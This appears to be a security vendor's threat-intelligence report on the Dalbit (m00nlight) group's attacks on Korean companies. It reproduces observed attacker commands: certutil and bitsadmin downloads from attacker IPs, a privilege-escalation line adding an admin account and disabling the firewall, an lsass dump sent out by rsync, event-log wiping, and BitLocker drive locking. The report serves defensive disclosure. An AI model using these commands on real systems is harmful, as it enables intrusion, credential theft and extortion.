This report is a continuation of the “Attackers Using FRP (Fast Reverse Proxy) to Attack Korean Companies” post that was uploaded on August 16, 2022 and follows the group’s activities since that post.
This group has always relied on open-source tools and lacked any distinct characteristics to profile them due to the lack of PDB information. Additionally, the amount of information that could be collected was limited unless the affected Korean companies specifically asked for an investigation since the threat actor’s C2 (Command&Control) server abused the servers of the Korean companies. However, after the post was uploaded and a portion of the Korean company servers used by the threat actor were blocked, the threat actor began to use a hosting server called “*.m00nlight.top” as their C2 and download server. Thus, the ASEC team decided to call this group Dalbit (m00nlight.top) after the Korean word for ‘Moonlight’.
This group has had more than 50 confirmed attack attempts on Korean companies since 2022. Most of the attacked companies were mid to small companies while a portion was major companies. The team has confirmed that 30% of the infected companies were using a certain Korean groupware solution. It is currently difficult to check whether this groupware product has a vulnerability or not, but if a server that is this exposed has a vulnerability, then there is a chance that companies could be affected gravely through the leakage of confidential information and ransomware behavior. Furthermore, this Dalbit group leaves some infected companies as proxies and download servers to later use them as means to communicate with the threat actor upon infiltration of another company.
Therefore, we strongly recommend performing an internal security check if users suspect that they have been attacked by this Dalbit group. The team asks that users send a report to AhnLab and take preemptive measures to prevent secondary harm and potential damage to other companies.
1. Affected Korean Companies (Industry Type)
Listed below are the 50 companies that were confirmed to have been affected since 2022. Companies that have not been clearly confirmed were excluded from this list. It is possible that more companies could have been affected.
The following are the descriptions of each industry type.
- Technology: Companies that handle software or hardware
- Industrial: Manufacturing companies that handle machinery, paint jobs, steel, metals, etc.
- Chemical: Cosmetic, pharmaceutical, and plastic companies
- Construction: Associations or organizations related to construction or construction companies
- Automobile: Automobile-related manufacturing companies
- Semiconductor: Semiconductor-related manufacturing companies
- Education: Educational companies
- Wholesale: Wholesalers
- Media: Printing and media companies
- Food: Food companies
- Shipping: Shipping companies
- Hospitality: Leisure or tourist accommodation companies
- Energy: Energy companies
- Shipbuilding: Shipbuilding companies
- Consulting: Management consulting companies
2. Flow and Characteristics
2.1. Summary Diagram
The above diagram shows the threat actor’s infiltration process into Company B. A brief summary of this flow is in the table below.
|1) Initial Access|
The threat actor targets web servers or SQL servers, which they gain access to by exploiting vulnerabilities. They then attempt to control the systems with tools such as WebShell.
2) Command & Control
Various hacking tools are downloaded through WebShell. Hacking tools include various binaries such as privilege escalation tools, proxy tools, and network scanning tools.
3) Proxy & Internal Reconnaissance
Proxy: The threat actor installs a proxy tool such as FRP (Fast Reverse Proxy) before attempting to connect to 2-1) a hosting server built by the threat actor or 2-2) another previously infected company’s server (Company A) via Remote Desktop (RDP).
Internal Reconnaissance: Tools such as network scanning tools and account theft tools are used for internal reconnaissance and obtaining information.
4) Lateral Movement
The obtained information is used to move to another connectible server or PC. Afterward, a proxy tool (FRP) is also installed on the PC that has successfully been reached through lateral movement, creating an environment which allows the threat actor to connect via RDP. The required privilege level is then acquired by either adding a specific account or through a credential theft tool like Mimikatz.
Ultimately, after the threat actor steals all the information they desire, they use BitLocker to lock certain drives and demand a ransom.
The following are major characteristics of the Dalbit group.
2.2. Characteristics of Dalbit
|Threat Actor’s C2 Servers||Download and C2 (Command&Control) servers: Korean company or hosting servers|
Over half of these servers are exploited Korean company servers
*.m00nlight.top or IP format addresses are often used for the hosting servers
|Attempts Control Through RDP||Usually attempts to access RDP after infection|
Either a proxy tool or Gotohttp is used for RDP connection
|Proxy Tools||Major proxy tools used include FRP, LCX (Htran),|
NPS, ReGeorg , etc.
|Add User Account||A net command is used to add an account|
Account credentials (ID: “main” / PW: “ff0.123456”)
|Open-source Tool||Mostly uses open-source tools that are publicly available|
A lot of tools are written in Chinese
|Evasion||VMProtect is used to prevent hacking tools from being detected|
Security event logs are deleted
|Extorted Information||User account credentials|
Installed program information
3. Tools Used and Infiltration Process
3.1. Tools and Malware Used
|WebShell||Downloader||Privilege Escalation||Proxy||Internal Reconnaissance|
|Certutil (Windows CMD)|
Bitsadmin (Windows CMD)
Nltest (Windows CMD)
|Lateral Movement||Information Leak and Collection||Backdoor||File Encryption||Evasion|
|Wevtutil (Windows CMD)|
WMI (Windows CMD)
EML Extractor (created)
|Security log deletion (Windows CMD)|
Firewall OFF (Windows CMD)
Attempts to delete AV products
Only one tool for leaking emails seems to have been made by the group themselves. The rest are normal Windows programs or tools that can easily be found online.
3.2. Infiltration Process
3.2.1. Initial Infiltration
It is assumed that their attack targets are usually servers with a specific Korean groupware installed on them, email servers (Exchange Server), and SQL servers. The threat actor exploited either file upload vulnerabilities or WebLogic vulnerabilities such as CVE-2017-10271 to upload their WebShell. A portion appeared to have used a SQL server command prompt (xp_cmdshell).
The most frequently used WebShells are Godzilla, ASPXSpy, AntSword, and China Chopper in that order. Aside from these, several other WebShells were also found.
The installation paths of the WebShells are as follows.
|– Job recruitment (File upload vulnerability)|
– File upload vulnerability
– Certain groupware
– Email server (Exchange Server)
D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\aa.aspx
D:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\11.aspx
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\91080f08\2694eff0\app_web_defaultwsdlhelpgenerator.aspx.cdcab7d2.sjx_41yb.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\91080f08\2694eff0\app_web_ldaj2kwn.dll
– Weblogic D:\***\wls1035\domains\************\servers\*******\tmp\************\uddiexplorer\gcx62x\war\modifyregistryhelp.jsp
The threat actor downloads other hacking tools through default Windows programs. Since WebShells are normally used in infiltration, parent processes, excluding command processes like cmd, are run by web server processes such as w3wp.exe, java.exe, sqlserver.exe, and tomcat*.exe. The downloaded files include privilege escalation tools, proxy tools, and network scanning tools, all of which are required by the threat actor. The download command is as follows.
(Additionally, the full addresses of the Korean companies that have been exploited will not be disclosed.)
|> certutil -urlcache -split -f hxxp://www.ive***.co[.]kr/uploadfile/ufaceimage/1/update.zip c:\programdata\update.exe (frpc)|
> certutil -urlcache -split -f hxxp://121.167.***[.]***/temp/8.txt c:\programdata\8.ini (frpc.ini)
> certutil -urlcache -split -f hxxp://103.118.42[.]208:8080/frpc.exe frpc.exe
|> bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8080/calc32.exe” “c:\windows\debug\winh32.exe” (frpc)|
> bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8001/log.ini” “c:\windows\debug\log.ini” (frpc.ini)
The hacking tools and malware downloaded by the threat actor were usually found in the following paths.
Therefore, the files in these paths should be checked if users suspect that they have been infiltrated.
3.2.3. Privilege Escalation and Account Addition
The threat actor mainly used Potato (BadPotato, JuicyPotato, SweetPotato, RottenPotato, EFSPotato) and PoC (CVE-2018-8639, CVE-2019-1458), which has been published on GitHub, for privilege escalation. After privilege escalation, they characteristically add the following account.
The below sp.exe is the SweetPotato tool.
|> sp.exe “whaomi” (Privilege check)|
> sp.exe “netsh advfirewall set allprofiles state off” (Firewall OFF)
> sp.exe “net user main ff0.123456 /add & net localgroup administrators main /add” (Add account)
The point of focus here is the name of the account added by the threat actor. Threat actor accounts with the name “main” have been found in other infiltrated company servers.
Aside from adding accounts, the threat actor would also use stolen admin accounts.
|> wmic /node:127.0.0.1 /user:storadmin /password:r*****1234!@#$ process call create “cmd.exe /c c:\temp\s.bat”|
3.2.4. Proxy Settings
After infiltrating a server, the threat actor initiates access via proxy to use RDP communications. FRP and LCX were the mainly used proxy tools, and there have been cases where ReGeorg, NPS, or RSOCKS was found in some companies. Additionally, multiple proxy tools including FRP and LCX were found in one area of a certain company that was infiltrated. Multiple FRP configuration files (.ini) would also be discovered in cases where internal propagation had occurred. We believe that the threat actor installs additional FRPs and uses multiple configuration files when an accessible PC has a lot to gain. Furthermore, the LCX used by this group has the same features as the open-source LCX, but its version is not the same as the one uploaded to GitHub, meaning that a binary that was arbitrarily compiled by a Chinese person was used.
Proxy tools like FRP and LCX differ in terms of forwarding methods and supported protocols. However, since their differences, actual infection cases, recreation, and network packets have all been covered in the TI report, “Analysis Report on Attack Cases Exploiting Various Remote Control Tools,” they will not be reiterated in this post.
1) FRP(FAST REVERSE PROXY)
FRP configuration files (.ini) were found in all servers and PC devices infiltrated by this group. The following is an actual case of an infiltrated company.
In particular, the Dalbit group usually used the Socks5 protocol to communicate. The Socks5 protocol is a layer 5 protocol in the 7 OSI layers. It can handle various requests such as HTTP, FTP, and RDP since it is between layer 4 and 7. Therefore, if the threat actor uses a proxy connection tool that can handle Socks5, such as Proxifier, remote control through RDP becomes possible. If a connection can be established to an internal PC, lateral movement can also be achieved. Thus, if the configuration file is set as a Socks5 protocol, the threat actor will have more freedom as additional modifications will no longer be required to handle various requests.
The following are FRP filenames and commands used by the threat actor. The list is in a descending order from most to least used.
- FRP filenames
- FRP commands
|> update.exe -c frpc.ini|
> update.exe -c 8080.ini
> update.exe -c 8.ini
> info.zip -c frpc__8083.ini
> debug.exe -c debug.ini
> debug.exe -c debug.log
> debug.exe -c debug.txt
> frpc.exe -c frpc__2381.ini
> cmd.exe /c c:\temp\****\temp\frpc.ini
In certain companies, the FRP was registered to the task scheduler (schtasks) under the name “debug” to maintain its persistence. As shown in Table 12, the team confirmed the execution of a registered scheduler.
|> schtasks /tn debug /run|
Dalbit used an LCX (Htran) binary compiled by a certain Chinese person. This has the same features as the existing binary, but it also includes the nickname of the binary creator.
We can confirm through this that the nickname of the person who had created the binary is “折羽鸿鹄” (QQ:56345566). It is highly unlikely that this developer is the threat actor in question; however, since this binary cannot be downloaded through a simple search online, it is assumed that the threat actor has a connection to China.
The installed filenames and executables are as follows:
- LCX filenames
- LCX commands
|> update.exe -slave 1.246.***.*** 110 127.0.0.1 3389|
> lcx3.exe -slave 222.239.***.*** 53 127.0.0.1 3389
The above LCX C2 is a Korean company server and has been concealed.
3.2.5. Internal Reconnaissance
Fscan and NBTScan have been commonly used for network scans, but the usage of TCP Scan and Goon have also been confirmed for some cases.
Goon is a network scanning tool made with Golang that not only allows basic port scanning, but scanning for Tomcat, MSSQL, and MYSQL accounts as well. We can see that this tool was also made in Chinese.
3.2.6. Information Extortion
LSASS Dump information and EML files of certain accounts are usually the information that is stolen. It has been confirmed that installed programs are checked through a WMIC command or a screenshot of the affected PC is sent to the threat actor’s server at regular intervals according to the companies.
1) Credential Extraction (LSASS Dump)
According to the target, the threat actor would choose to not install Mimikatz and attempt to extract credentials instead. This is a method that dumps the Lsass.exe process. Credential information can be obtained from a PC with tools like Mimikatz or Pypykatz since they can be found within the dump file. Additionally, a detailed explanation of Mimikatz can be found in the TI report, “Analysis Report on Internal Web Spreading Methods Using Mimikatz“.
The following method is how the threat actor stole credentials without Mimikatz.
Open-source Dumpert is an API hooking evasion tool that operates according to the target OS system and uses the MiniDumpWriteDump() API to dump the lsass.exe process. The threat actor modified the code to change the path of the dump file and remove features like log output.
The above figure shows that the two versions are the same aside from the different paths and the removal of the output string.
The following table displays all of the “%SystemRoot%\temp” dump file paths that have currently been found.
1-2 ) Procdump
Procdump is a normal utility program provided by Microsoft and offers the process dump feature. The threat actor performed a dump like the one in Figure 8 with this tool.
Afterward, the threat actor used a tool called Rsync (Remote Sync) to send the dump file to their own server. The following is an actual example of information theft attempted by the threat actor.
|> svchost.exe -accepteula -ma lsass.exe web_log.dmp|
> rsync -avz –port 443 web_log.zip firstname.lastname@example.org[.]95::share/web_log.zip
2) Email Extraction
This sample is an email extraction tool developed with Golang and presumably the only known tool developed by the threat actor themselves. This tool offers the ability to target a company’s Exchange email server and extract a specific account’s email with EWS (Exchange Web Service) as an EML file. Arguments include the Exchange server address, account name, NTLM password hash of said account, date and time, etc. When launched, the tool extracts every email from the mailboxes of the target account according to the time received as an argument and saves them as an EML file.
For reference, the PDB information of this binary is “fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff”and is meaningless.
3) Screen Leak
The threat actor sent screenshots from certain PCs to their own server. While a binary that takes screenshots of the current screen has not been found as of yet, the threat actor’s server where the infected PC’s screenshots were being sent has been discovered. Screenshots from a certain company’s infiltrated PC sent pictures every 5-10 seconds.
|Outgoing server of threat actor’s screenshots: hxxp://91.217.139[.]117:8080/1.bat|
Only images were sent. The PC could not be controlled remotely and no audio was outputted either.
Also, the threat actor’s server (91.217.139[.]117) where the screenshots were being sent was also being used as a download server for another company.
|>certutil -urlcache -split -f hxxp://91.217.139[.]117:8080/calc32.exe|
>certutil -split -urlcache -f hxxp://91.217.139[.]117:8443/log.ini c:\temp >bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8080/calc32.exe” “c:\windows\debug\winh32.exe” (frpc)
>bitsadmin /transfer mydownloadjob /download /priority normal “hxxp://91.217.139[.]117:8001/log.ini” “c:\windows\debug\log.ini” (frpc.ini)
4) Lookup Installed Programs and Login Information
The threat actor used a WMIC command to check installed programs.
|> wmic product get name,version|
Furthermore, the domain account credentials that caused certain event IDs to occur in the event log were collected. The created file is saved in c:\temp\EvtLogon.dat.
|4768||Kerberos authentication request|
|4776||NTLM authentication attempt|
|> wevtutil qe security /q:”Event[System[(EventID=4624 or EventID=4768 or EventID=4776)]]” /f:text /rd:true >> c:\temp\EvtLogon.dat|
3.2.7. File Encryption
Details about this matter have been covered in a past blog post. The threat actor used BitLocker, a Windows utility, to encrypt certain drives and demand ransoms. Currently, more affected companies are still being found.
- BitLocker commands
|> “C:\Windows\System32\BitLockerWizardElev.exe” F:\ T |
> manage-bde -lock -ForceDismount F:
> manage-bde -lock -ForceDismount e:
> “c:\windows\system32\bitlockerwizardelev.exe” e:\ t
> “c:\windows\system32\bitlockerwizardelev.exe” f:\ u
Figure 13 is the ransom note used by the threat actor. The threat actor used anonymous mailing services such as startmail.com and onionmail.com.
The command assumed to be for downloading the ransom note is as follows.
|> certutil -urlcache -split -f hxxp://175.24.32[.]228:8888/readme c:\windows\temp\readme|
1) VMPROTECT PACKING
When the binary was detected after being uploaded, the threat actor packed it with VMProtect to try and avoid detection.
|– Privilege escalation tools|
– Proxy tools
2) Windows Event Log Deletion Using Wevtutil
|Removal of security event logs|
> cmd.exe /c wevtutil cl security
Removal of application logs
> cmd.exe wevtutil.exe el
> cmd.exe wevtutil.exe cl “application”
3) Firewall OFF
|sp.exe “netsh advfirewall set allprofiles state off”|
The Dalbit hacking group attempted attacks against vulnerable Korean company servers, and logs are being reported not only from mid-sized and smaller businesses, but also from some large companies. In particular, 30% of the affected companies were found to have been using a certain Korean groupware product. Moreover, this group uses publicly available tools, from the WebShell used in the early stages to the ransomware used at the end. Among these tools, there is a proxy tool that is assumed to have been obtained from a Chinese community, a tool with Chinese documentation, and a Chinese tool not mentioned in this post. It can be assumed that the threat actor has at least a partial connection with China, considering their frequent usage of Chinese tools.
If a server admin suspects that their system has been infected, they are advised to check their IOC along with the aforementioned download paths and account name (“main”) often used by the threat actor. If suspicions are confirmed, then it is advised to immediately report your situation to AhnLab in order to minimize additional harm. Furthermore, admins should prevent vulnerability attacks by updating their servers to the newest version for vulnerability patches, and maintenance is especially needed for servers that are open externally but not managed.
For reference, the IP addresses of Korean company servers abused by the threat actor will not be disclosed on the ASEC blog.
- Mitre Attack
|Execution||Persistence||Privilege Escalation||Credential Access||Discovery||Defense Evasion||Lateral Movement||Collection||Exfiltration||Command and Control||Impact||Resource Development|
|– Command and Scripting Interpreter(T1059)|
– Windows Management Instrumentation(T1047)
– System Service(T1569)
|– Scheduled Task/Job(T1053)|
– Create Account(T1136)
– Server Software Component(T1505)
– Account Manipulation(T1098)
|– Access Token Manipulation(T1134)|
– Exploitation for Privilege Escalation(T1068)
|– OS Credential Dumping (T1003)||– Remote System Discovery(T1018)|
– Network Service Discovery(T1046)
|– Impair Defenses(T1562)|
– Indicator Removal(T1070)
|– Remote Services(T1021)|
– Lateral Tool Transfer(T1570)
|– Data from Local System(T1005)|
– Account Discovery: Email Account(1087.003)
– Email Collection(T1114)
– Screen Capture(T1113)
|– Exfiltration Over Web Service(T1567)||– Proxy(T1090)|
– Ingress Tool Transfer(T1105)
|– Data Encrypted for Impact(T1486)||– Stage Capabilities: Upload Malware(T1608.001)|
- Detection Names
- MD5 (Excluding normal files)
– Privilege Escalation
– Network Scan
– Proxies etc.
– Lateral Movement
– Information Collection and Credential Theft
- C2 and URL (Abused Korean company servers are not listed)
|– Download C2|
– Upload C2
– FRP & LCX C2
hxxp://sk1.m00nlight[.]top:80 (184.108.40.206) //MOACK_Co_LTD company server
hxxps://fk.m00nlight[.]top:443 (220.127.116.11:443) //MOACK_Co_LTD company server
hxxps://aa.zxcss[.]com:443 (18.104.22.168) //MOACK_Co_LTD company server
45.93.31[.]75:7777 //MOACK_Co_LTD company server
45.93.28[.]103:8080 //MOACK_Co_LTD company server
– Backdoor C2
45.93.31[.]75 //MOACK_Co_LTD company server
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
[…] FORRÁS […]
[…] Dalbit (m00nlight): Chinese Hacker Group’s APT Attack Campaign […]